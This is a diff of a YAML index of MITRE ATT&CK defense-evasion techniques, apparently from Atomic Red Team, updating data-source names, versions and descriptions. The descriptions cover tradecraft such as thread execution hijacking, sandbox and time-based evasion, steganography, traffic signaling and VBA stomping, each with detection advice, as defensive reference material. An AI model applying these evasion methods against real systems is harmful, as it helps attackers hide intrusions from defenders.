x_mitre_version: '1.0' + x_mitre_defense_bypassed: + - Application control identifier: T1574.011 atomic_tests: - name: Service Registry Permissions Weakness 
@@ -40150,9 +32612,9 @@ defense-evasion: setgid bits set. Monitor for execution of utilities, like chmod, and their command-line arguments to look for setuid or setguid bits being set. x_mitre_data_sources: - - File monitoring - - Process monitoring - - Process command-line parameters + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' x_mitre_platforms: - Linux - macOS @@ -40251,7 +32713,7 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-10-21T18:37:15.275Z' + modified: '2021-01-20T18:12:12.134Z' created: '2018-04-18T17:59:24.739Z' x_mitre_is_subtechnique: false x_mitre_platforms: @@ -40272,15 +32734,13 @@ defense-evasion: - Hans Christoffer Gaardløs - Praetorian x_mitre_data_sources: - - API monitoring - - File monitoring - - Binary file metadata - - Process use of network - - Windows Registry - - Loaded DLLs - - DLL monitoring - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'File: File Creation' + - 'Module: Module Load' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Modification' + - 'Network Traffic: Network Connection Creation' x_mitre_version: '2.1' identifier: T1218 atomic_tests: @@ -40589,8 +33049,9 @@ defense-evasion: x_mitre_contributors: - Praetorian x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Script: Script Execution' x_mitre_version: '1.1' identifier: T1216 atomic_tests: @@ -40682,7 +33143,8 @@ defense-evasion: activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code. x_mitre_data_sources: - - Binary file metadata + - 'File: File Metadata' + - 'File: File Content' x_mitre_contributors: - Filip Kafka, ESET x_mitre_platforms: 
@@ -40810,8 +33272,7 @@ defense-evasion: x_mitre_contributors: - Erye Hernandez, Palo Alto Networks x_mitre_data_sources: - - File monitoring - - Process monitoring + - 'File: File Metadata' x_mitre_detection: It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the 
@@ -40837,6 +33298,30 @@ defense-evasion: name: manual T1027.003: technique: + created: '2020-02-05T14:28:16.719Z' + modified: '2020-09-16T19:24:20.350Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + type: attack-pattern + id: attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916 + description: "Adversaries may use steganography techniques in order to prevent + the detection of hidden information. Steganographic techniques can be used + to hide data in digital media such as images, audio tracks, video clips, or + text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early + example of malware that used steganography. It encrypted the gathered information + from a victim's system and hid it within an image before exfiltrating the + image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a + threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) + commands in an image file (.png) and execute the code on a victim's system. + In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) + code downloaded another obfuscated script to gather intelligence from the + victim's machine and communicate it back to the adversary.(Citation: McAfee + Malicious Doc Targets Pyeongchang Olympics) " + name: Steganography + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1027.003 
@@ -40851,42 +33336,18 @@ defense-evasion: description: Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018. source_name: McAfee Malicious Doc Targets Pyeongchang Olympics - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Steganography - description: "Adversaries may use steganography techniques in order to prevent - the detection of hidden information. Steganographic techniques can be used - to hide data in digital media such as images, audio tracks, video clips, or - text files.\n\n[Duqu](https://attack.mitre.org/software/S0038) was an early - example of malware that used steganography. It encrypted the gathered information - from a victim's system and hid it within an image before exfiltrating the - image to a C2 server.(Citation: Wikipedia Duqu) \n\nBy the end of 2017, a - threat group used Invoke-PSImage to hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) - commands in an image file (.png) and execute the code on a victim's system. - In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) - code downloaded another obfuscated script to gather intelligence from the - victim's machine and communicate it back to the adversary.(Citation: McAfee - Malicious Doc Targets Pyeongchang Olympics) " - id: attack-pattern--c2e147a9-d1a8-4074-811a-d8789202d916 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T19:24:20.350Z' - created: '2020-02-05T14:28:16.719Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_detection: Detection of steganography is difficult unless artifacts - are left behind by the obfuscation process that are detectable with a known - signature. 
Look for strings are other signatures left in system artifacts - related to decoding steganography. - x_mitre_data_sources: - - Binary file metadata x_mitre_platforms: - Linux - macOS - Windows + x_mitre_data_sources: + - 'File: File Content' + x_mitre_detection: Detection of steganography is difficult unless artifacts + are left behind by the obfuscation process that are detectable with a known + signature. Look for strings are other signatures left in system artifacts + related to decoding steganography. + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' atomic_tests: [] T1553: technique: @@ -40936,23 +33397,20 @@ defense-evasion: kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-20T22:42:26.314Z' + modified: '2021-04-26T15:41:39.612Z' created: '2020-02-05T14:54:07.588Z' x_mitre_platforms: - Windows - macOS - Linux x_mitre_data_sources: - - Binary file metadata - - File monitoring - - Process command-line parameters - - Process monitoring - - API monitoring - - Application logs - - DLL monitoring - - Loaded DLLs - - Windows Registry - - Windows event logs + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Metadata' + - 'File: File Modification' + - 'Module: Module Load' x_mitre_detection: "Collect and analyze signing certificate metadata on software that executes within the environment to look for unusual certificate characteristics and outliers. Periodically baseline registered SIPs and trust providers (Registry 
@@ -41033,8 +33491,10 @@ defense-evasion: sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file. x_mitre_data_sources: - - File monitoring - - Process command-line parameters + - 'Process: Process Metadata' + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' x_mitre_platforms: - Linux - macOS @@ -41095,7 +33555,7 @@ defense-evasion: before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors. \n\nSpecific checks - may will vary based on the target and/or adversary, but may involve behaviors + will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047), [PowerShell](https://attack.mitre.org/techniques/T1059/001), [System Information Discovery](https://attack.mitre.org/techniques/T1082), and [Query Registry](https://attack.mitre.org/techniques/T1012) @@ -41104,8 +33564,8 @@ defense-evasion: the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. \n\nChecks could include generic system properties - such as uptime and samples of network traffic. Adversaries may also check - the network adapters addresses, CPU core count, and available memory/drive + such as host/domain name and samples of network traffic. Adversaries may also + check the network adapters addresses, CPU core count, and available memory/drive size. \n\nOther common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific 
@@ -41138,7 +33598,7 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: discovery - modified: '2020-07-01T16:32:02.514Z' + modified: '2021-04-21T15:16:10.604Z' created: '2020-03-06T20:57:37.959Z' x_mitre_platforms: - Linux @@ -41147,8 +33607,9 @@ defense-evasion: x_mitre_contributors: - Deloitte Threat Library Team x_mitre_data_sources: - - Process command-line parameters - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: Virtualization/sandbox related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed @@ -41160,7 +33621,7 @@ defense-evasion: or perform other forms of Discovery, especially in a short period of time, may aid in detection. x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_defense_bypassed: - Static File Analysis - Signature-based detection @@ -41283,9 +33744,7 @@ defense-evasion: - McAfee - Ryan Becwar x_mitre_data_sources: - - EFI - - BIOS - - API monitoring + - 'Firmware: Firmware Modification' x_mitre_detection: |- System firmware manipulation may be detected. (Citation: MITRE Trustworthy Firmware Measurement) Dump and inspect BIOS images on vulnerable systems and compare against known good images. (Citation: MITRE Copernicus) Analyze differences to determine if malicious changes have occurred. Log attempts to read/write to BIOS and compare against known patching behavior. 
@@ -41348,11 +33807,9 @@ defense-evasion: modified: '2020-10-22T16:35:53.806Z' created: '2020-10-20T00:06:56.180Z' x_mitre_data_sources: - - Network device run-time memory - - Network device command history - - Network device configuration - - File monitoring - - Network device logs + - 'Command: Command Execution' + - 'Network Traffic: Network Connection Creation' + - 'Firmware: Firmware Modification' x_mitre_permissions_required: - Administrator x_mitre_detection: |- @@ -41431,10 +33888,9 @@ defense-evasion: x_mitre_defense_bypassed: - Static File Analysis x_mitre_data_sources: - - Anti-virus - - Email gateway - - Network intrusion detection system - - Web logs + - 'Process: Process Creation' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_contributors: - Brian Wiltse @evalstrings - Patrick Campbell, @pjcampbe11 
@@ -41472,19 +33928,15 @@ defense-evasion: name: command_prompt T1055.003: technique: - external_references: - - source_name: mitre-attack - external_id: T1055.003 - url: https://attack.mitre.org/techniques/T1055/003 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Thread Execution Hijacking + created: '2020-01-14T01:28:32.166Z' + modified: '2020-11-10T18:29:30.941Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + id: attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6 description: "Adversaries may inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. Thread Execution Hijacking is a method of executing arbitrary code in the 
@@ -41496,29 +33948,29 @@ defense-evasion: can be suspended then written to, realigned to the injected code, and resumed via SuspendThread , VirtualAllocEx, WriteProcessMemory, SetThreadContext, then ResumeThread respectively.(Citation: - Endgame Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) + Elastic Process Injection July 2017)\n\nThis is very similar to [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) but targets an existing process rather than creating a process in a suspended state. \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via Thread Execution Hijacking may also evade detection from security products since the execution is masked under a legitimate process. " - id: attack-pattern--41d9846c-f6af-4302-a654-24bba2729bc6 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - modified: '2020-06-20T22:21:29.233Z' - created: '2020-01-14T01:28:32.166Z' - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - Process monitoring - - API monitoring - x_mitre_permissions_required: - - User + name: Thread Execution Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1055.003 + url: https://attack.mitre.org/techniques/T1055/003 + - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process + description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: + A Technical Survey Of Common And Trending Process Injection Techniques. 
+ Retrieved December 7, 2017.' + source_name: Elastic Process Injection July 2017 + x_mitre_platforms: + - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' x_mitre_detection: "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances @@ -41527,14 +33979,18 @@ defense-evasion: such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for - this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze + this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Process: OS API Execution' + - 'Process: Process Access' + x_mitre_defense_bypassed: + - Application control + - Anti-virus atomic_tests: [] T1055.005: technique: @@ -41551,7 +34007,7 @@ defense-evasion: description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 + source_name: Elastic Process Injection July 2017 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 
@@ -41578,14 +34034,14 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-06-20T22:23:30.093Z' + modified: '2020-11-10T18:29:30.984Z' created: '2020-01-14T01:30:41.092Z' x_mitre_defense_bypassed: - Anti-virus - Application control x_mitre_data_sources: - - Process monitoring - - API monitoring + - 'Process: OS API Execution' + - 'Process: Process Access' x_mitre_detection: "Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances @@ -41594,7 +34050,7 @@ defense-evasion: such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for - this technique.(Citation: Endgame Process Injection July 2017)\n\nAnalyze + this technique.(Citation: Elastic Process Injection July 2017)\n\nAnalyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. " 
@@ -41605,25 +34061,13 @@ defense-evasion: atomic_tests: [] T1497.003: technique: - created: '2020-03-06T21:11:11.225Z' - modified: '2020-07-01T16:32:02.532Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: discovery - type: attack-pattern id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0 - description: "Adversaries may employ various time-based methods to detect and - avoid virtualization and analysis environments. This may include timers or - other triggers to avoid a virtual machine environment (VME) or sandbox, specifically - those that are automated or only operate for a limited amount of time.\n\nAdversaries - may employ various time-based evasions, such as delaying malware functionality - upon initial execution using programmatic sleep commands or native system - scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). - Delays may also be based on waiting for specific victim conditions to be met - (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) - to avoid analysis and scrutiny. " + description: |- + Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time. + + Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) 
or employ scheduled [Multi-Stage Channels](https://attack.mitre.org/techniques/T1104) to avoid analysis and scrutiny. + + Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment's timestamp before and after execution of a sleep function.(Citation: ISACA Malware Tricks) name: Time Based Evasion created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: @@ -41632,6 +34076,18 @@ defense-evasion: - source_name: mitre-attack external_id: T1497.003 url: https://attack.mitre.org/techniques/T1497/003 + - source_name: ISACA Malware Tricks + url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes + description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How + Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.' + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: discovery + modified: '2021-04-01T15:48:28.345Z' + created: '2020-03-06T21:11:11.225Z' x_mitre_platforms: - Linux - macOS @@ -41639,8 +34095,9 @@ defense-evasion: x_mitre_contributors: - Deloitte Threat Library Team x_mitre_data_sources: - - Process monitoring - - Process command-line parameters + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_detection: 'Time-based evasion will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain 
@@ -41651,7 +34108,7 @@ defense-evasion: being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ' x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_defense_bypassed: - Host forensic analysis - Signature-based detection @@ -41688,9 +34145,8 @@ defense-evasion: - macOS - Windows x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - File monitoring + - 'File: File Modification' + - 'File: File Metadata' x_mitre_detection: 'Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring @@ -41973,10 +34429,8 @@ defense-evasion: x_mitre_platforms: - Windows x_mitre_data_sources: - - Process command-line parameters - - Process monitoring - - Access tokens - - API monitoring + - 'Process: OS API Execution' + - 'Command: Command Execution' x_mitre_detection: |- If an adversary is using a standard command-line shell, analysts can detect token manipulation by auditing command-line activity. Specifically, analysts should look for use of the runas command. Detailed command-line logging is not enabled by default in Windows.(Citation: Microsoft Command-line Logging) 
@@ -42017,18 +34471,18 @@ defense-evasion: elevation_required: true T1205: technique: - revoked: false - id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Traffic Signaling - description: |- - Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. - - Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). - - The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. - - On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. 
Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. + created: '2018-04-18T17:59:24.739Z' + modified: '2021-02-17T14:23:49.495Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1205 
@@ -42049,37 +34503,54 @@ defense-evasion: url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-21T15:30:44.964Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_contributors: - - Josh Day, Gigamon - x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow - x_mitre_permissions_required: - - User + - source_name: Bleeping Computer - Ryuk WoL + url: https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ + description: Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan + To Encrypt Offline Devices. Retrieved February 11, 2021. + - source_name: AMD Magic Packet + url: https://www.amd.com/system/files/TechDocs/20213.pdf + description: AMD. (1995, November 1). Magic Packet Technical White Paper. + Retrieved February 17, 2021. + - source_name: GitLab WakeOnLAN + url: https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN + description: Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February + 17, 2021. + description: |- + Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. 
This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. + + Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). + + The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. + + On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. 
+ + Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet) + name: Traffic Signaling + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c + revoked: false + x_mitre_is_subtechnique: false + x_mitre_version: '2.2' + x_mitre_defense_bypassed: + - Defensive network service scanning + x_mitre_detection: |- + Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows. + + The Wake-on-LAN magic packet consists of 6 bytes of FF followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN) + x_mitre_network_requirements: true x_mitre_platforms: - Linux - macOS - Windows - Network - x_mitre_network_requirements: true - x_mitre_detection: Record network packets sent to and from the system, looking - for extraneous packets that do not belong to established flows. - x_mitre_defense_bypassed: - - Defensive network service scanning - x_mitre_version: '2.1' - x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + x_mitre_contributors: + - Josh Day, Gigamon atomic_tests: [] T1127: technique: 
@@ -42120,15 +34591,15 @@ defense-evasion: kill_chain_phases: - phase_name: defense-evasion kill_chain_name: mitre-attack - modified: '2020-06-20T22:43:41.298Z' + modified: '2021-03-05T22:25:49.118Z' created: '2017-05-31T21:31:39.262Z' x_mitre_version: '1.2' x_mitre_contributors: - Casey Smith - Matthew Demaske, Adaptforward x_mitre_data_sources: - - File monitoring - - Process monitoring + - 'Process: Process Creation' + - 'Command: Command Execution' x_mitre_defense_bypassed: - Application control x_mitre_detection: |- @@ -42149,7 +34620,7 @@ defense-evasion: Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected. - A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity. For example, AWS GuardDuty is not supported in every region.(Citation: AWS Region Service Table) + A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity. An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions) name: Unused/Unsupported Cloud Regions 
@@ -42157,35 +34628,27 @@ defense-evasion: object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - - external_id: T1535 - source_name: mitre-attack + - source_name: mitre-attack + external_id: T1535 url: https://attack.mitre.org/techniques/T1535 - - source_name: AWS Region Service Table - url: https://aws.amazon.com/about-aws/global-infrastructure/regional-product-services/ - description: Amazon. (2019, October 22). Region Table. Retrieved October 22, - 2019. - - source_name: CloudSploit - Unused AWS Regions - url: https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc - description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. + - description: CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019. + url: https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc + source_name: CloudSploit - Unused AWS Regions type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-07-14T19:17:44.563Z' + modified: '2021-04-22T16:46:43.876Z' created: '2019-09-04T14:35:04.617Z' x_mitre_is_subtechnique: false x_mitre_platforms: - - AWS - - GCP - - Azure + - IaaS x_mitre_contributors: - Netskope - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_data_sources: - - Stackdriver logs - - Azure activity logs - - AWS CloudTrail logs + - 'Instance: Instance Creation' x_mitre_permissions_required: - User x_mitre_detection: 'Monitor system logs to review activities occurring across @@ -42239,9 +34702,9 @@ defense-evasion: phase_name: defense-evasion - kill_chain_name: mitre-attack phase_name: lateral-movement - modified: '2020-09-16T19:40:44.714Z' + modified: '2021-04-14T18:09:47.427Z' created: '2020-01-30T16:18:36.873Z' - x_mitre_version: '1.0' + x_mitre_version: '1.1' x_mitre_is_subtechnique: false x_mitre_defense_bypassed: - System Access Controls 
@@ -42257,13 +34720,16 @@ defense-evasion: user has an active login session but has not entered the building or does not have VPN access).' x_mitre_data_sources: - - Office 365 audit logs - - OAuth audit logs - - Authentication logs + - 'Logon Session: Logon Session Creation' + - 'Web Credential: Web Credential Usage' + - 'Application Log: Application Log Content' + - 'User Account: User Account Authentication' + - 'Active Directory: Active Directory Credential Request' x_mitre_platforms: - Windows - Office 365 - SaaS + - Google Workspace atomic_tests: [] T1497.002: technique: @@ -42331,8 +34797,9 @@ defense-evasion: other forms of Discovery, especially in a short period of time, may aid in detection. ' x_mitre_data_sources: - - Process command-line parameters - - Process use of network + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'Process: OS API Execution' x_mitre_contributors: - Deloitte Threat Library Team x_mitre_platforms: @@ -42400,8 +34867,8 @@ defense-evasion: If the document is opened with a Graphical User Interface (GUI) the malicious p-code is decompiled and may be viewed. However, if the PROJECT stream, which specifies the project properties, is modified in a specific way the decompiled VBA code will not be displayed. For example, adding a module name that is undefined to the PROJECT stream will inhibit attempts of reading the VBA source code through the GUI.(Citation: FireEye VBA stomp Feb 2020) x_mitre_data_sources: - - Process monitoring - - File monitoring + - 'Script: Script Execution' + - 'File: File Content' x_mitre_contributors: - Rick Cole, FireEye x_mitre_platforms: 
